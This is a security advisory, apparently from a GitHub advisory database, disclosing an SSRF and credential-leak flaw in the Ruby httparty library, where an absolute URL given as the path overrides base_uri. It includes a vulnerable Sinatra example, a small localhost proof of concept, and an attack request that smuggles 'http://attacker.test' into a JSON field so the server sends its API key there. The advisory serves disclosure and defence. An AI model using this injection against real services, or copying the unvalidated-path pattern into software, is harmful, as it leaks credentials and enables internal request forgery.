"details": "## Summary\n\nThere may be an SSRF vulnerability in httparty. This issue can pose a risk of leaking API keys, and it can also allow third parties to issue requests to internal servers.\n\n## Details\n\nWhen httparty receives a path argument that is an absolute URL, it ignores the `base_uri` field. As a result, if a malicious user can control the path value, the application may unintentionally communicate with a host that the programmer did not anticipate.\n\nConsider the following example of a web application:\n\n```rb\nrequire 'sinatra'\nrequire 'httparty'\n\nclass RepositoryClient\n include HTTParty\n base_uri 'http://exmaple.test/api/v1/repositories/'\n headers 'X-API-KEY' => '1234567890'\nend\n\npost '/issue' do\n request_body = JSON.parse(request.body.read)\n RepositoryClient.get(request_body['repository_id']).body\n # do something\n json message: 'OK'\nend\n```\n\nNow, suppose an attacker sends a request like this:\n\n```\nPOST /issue HTTP/1.1\nHost: localhost:10000\nContent-Type: application/json\n\n{\n \"repository_id\": \"http://attacker.test\",\n \"title\": \"test\"\n}\n```\n\nIn this case, httparty sends the `X-API-KEY` not to `http://example.test` but instead to `http://attacker.test`.\n\nIs this behavior considered intentional in httparty?\n\nA similar problem was reported and fixed in the HTTP client library axios in the past: \n<https://github.com/axios/axios/issues/6463>\n\nAlso, Python's `urljoin` function has documented a warning about similar behavior: \n<https://docs.python.org/3.13/library/urllib.parse.html#urllib.parse.urljoin>\n\nIn my opinion, httparty should verify, right before sending the request, that either of the following conditions is met:\n\n1. The destination URL has a prefix matching `base_uri`. \n2. `base_uri` is not set.\n\n## PoC\n\nFollow these steps to reproduce the issue:\n\n1. Set up two simple HTTP servers.\n\n ```bash\n mkdir /tmp/server1 /tmp/server2\n echo \"this is server1\" > /tmp/server1/index.html \n echo \"this is server2\" > /tmp/server2/index.html\n python -m http.server -d /tmp/server1 10001 &\n python -m http.server -d /tmp/server2 10002 &\n ```\n\n2. Create a script (for example, `main.rb`):\n\n ```rb\n require 'httparty'\n\n class Client\n include HTTParty\n base_uri 'http://localhost:10001'\n end\n\n data = Client.get('http://localhost:10002').body\n puts data\n ```\n\n3. Run the script:\n\n ```bash\n $ ruby main.rb\n this is server2\n ```\n\nAlthough `base_uri` is set to `http://localhost:10001/`, httparty sends the request to `http://localhost:10002/`.\n\n\n## Impact\n\n- Leakage of credentials: If an absolute URL is provided, any API keys or credentials configured in httparty may be exposed to unintended third-party hosts. \n- SSRF (Server-Side Request Forgery): Attackers can force the httparty-based program to send requests to other internal hosts within the network where the program is running. \n- Affected users: Any software that uses `base_uri` and does not properly validate the path parameter may be affected by this issue.",
![advisory-database[bot]](https://avatars.githubusercontent.com/in/21409?v=4&size=40){kind=avatar}
0 commit comments